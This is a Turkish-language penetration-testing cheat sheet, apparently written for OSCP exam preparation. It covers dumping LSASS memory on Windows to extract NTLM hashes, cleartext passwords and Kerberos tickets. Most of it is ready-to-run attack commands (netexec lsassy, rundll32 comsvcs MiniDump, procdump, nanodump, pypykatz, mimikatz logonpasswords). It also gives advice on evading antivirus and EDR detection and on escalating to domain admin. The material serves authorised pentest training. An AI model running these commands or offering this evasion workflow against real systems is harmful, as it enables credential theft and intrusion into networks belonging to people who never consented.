Post ✓ EXAM-SAFE orta :445

LSASS Dump — comsvcs MiniDump, nanodump, procdump, pypykatz

Local admin / SYSTEM ile lsass.exe process'ini bellekten dumplayip cleartext sifre, NTLM hash, Kerberos bileti cikar. Disk'e minidump al (comsvcs.dll, procdump, nanodump) ve offline pypykatz/mimikatz ile parse et — boylece AV'nin live mimikatz tespitinden kacarsin.

ÖN KOŞULLAR

Hedef makinede local admin ya da SeDebugPrivilege/SYSTEM
Offline parse icin minidump dosyasini Kali'ye tasima yolu

┌──

Komutlar

netexec ✓ EXAM-SAFE admin

nxc smb {{RHOST}} -u {{USER}} -p {{PASS}} -M lsassy

Uzaktan lsass'i dumplayip lsassy ile parse eder, hash/cleartext'i dogrudan ekrana basar. NetExec Wiki — lsassy module; HackTricks — LSASS dumping

cmd ✓ EXAM-SAFE admin

tasklist /fi "imagename eq lsass.exe"

Windows'ta once lsass.exe PID'sini bul (comsvcs minidump bunu ister). HackTricks — Dumping LSASS (comsvcs)

rundll32 ✓ EXAM-SAFE admin

rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\Temp\lsass.dmp full

Yerlesik comsvcs.dll MiniDump ile lsass'i diske dumplar (LOLBin, ekstra arac gerekmez). HackTricks — LSASS comsvcs.dll MiniDump

procdump ✓ EXAM-SAFE admin

procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp

Sysinternals procdump (imzali, AV-friendly) ile full memory dump alir. HackTricks — LSASS procdump

nanodump ✓ EXAM-SAFE admin

nanodump.x64.exe --write C:\Windows\Temp\lsass.dmp

Gizli LSASS dump: invalid signature ile minidump yazar, AV/EDR tespitini zorlastirir. HackTricks — nanodump; Coalfire nanodump repo

pypykatz ✓ EXAM-SAFE

pypykatz lsa minidump C:/loot/lsass.dmp

Kali'de minidump'i offline parse eder; NTLM hash, cleartext, Kerberos ticket cikar. HackTricks — pypykatz offline parse; WADComs — pypykatz

mimikatz ✓ EXAM-SAFE

mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Mimikatz'i offline minidump moduna alip kimlik bilgilerini cikarir (Windows analiz host'unda). HackTricks — mimikatz sekurlsa::minidump; help-mimikatz

mimikatz ⚠ RESTRICTED admin

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Live (canli) lsass parse — hizli ama AV/EDR tarafindan en cok yakalanan yontem. HackTricks — mimikatz logonpasswords; help-mimikatz

LSASS neden hedef?

lsass.exe (Local Security Authority Subsystem) interaktif oturum acan kullanicilarin kimlik materyalini bellekte tutar: NTLM hash, bazi konfiglerde cleartext sifre (WDigest acik ise), ve Kerberos TGT/TGS biletleri. Bir makineye local admin oldugunda lsass dumplamak = o makineye giris yapmis tum kullanicilarin kimligini calmak. Domain admin bir makineye RDP yaptiysa, o makineyi dumplayinca DA olursun.

Strateji: dump al -> offline parse et

Live mimikatz sekurlsa::logonpasswords en gurultulu yontemdir ve Defender/EDR tarafindan aninda yakalanir. OSCP/gercek pentest’te tercih edilen akis:

Diske minidump yaz (comsvcs.dll, procdump ya da nanodump).
Dump dosyasini Kali’ye tasi (help-transfer).
Offline parse et (pypykatz lsa minidump ya da mimikatz sekurlsa::minidump).

Boylece parsing islemi hedef makinede degil senin host’unda olur — EDR’in goremedigi yer.

comsvcs.dll (LOLBin)

Yerlesik comsvcs.dll’in MiniDump export’u hicbir ekstra arac yuklemeden lsass’i dumplar. Once tasklist ile lsass PID’sini bul, sonra rundll32 ... MiniDump <PID> path full. PID dinamik oldugu icin hardcode etme.

procdump vs nanodump

procdump: Microsoft imzali, cogu AV beyaz listeye alir; ama ‘lsass’ argumani ML tespeti tetikleyebilir.
nanodump: Gecersiz minidump signature yazarak signature-based tespiti atlatir; EDR ortamlari icin daha gizli.

Sik hatalar

WDigest modern Windows’ta varsayilan kapali => cleartext gormeyebilirsin, sadece NTLM hash. Bu yeterli (pass-the-hash).
Protected LSASS (RunAsPPL) acik ise normal dump basarisiz olur; mimikatz !+/!processprotect ya da driver gerekir (genelde OSCP kapsami disi).
Dump dosyasini is bittiginde sil (cleanup) — disk uzerinde plaintext kredansiyel birakma.

┌──

Kaynaklar

↗ HackTricks — Stealing Credentials (LSASS)↗ NetExec Wiki — lsassy / nanodump / procdump modules ↗ pypykatz GitHub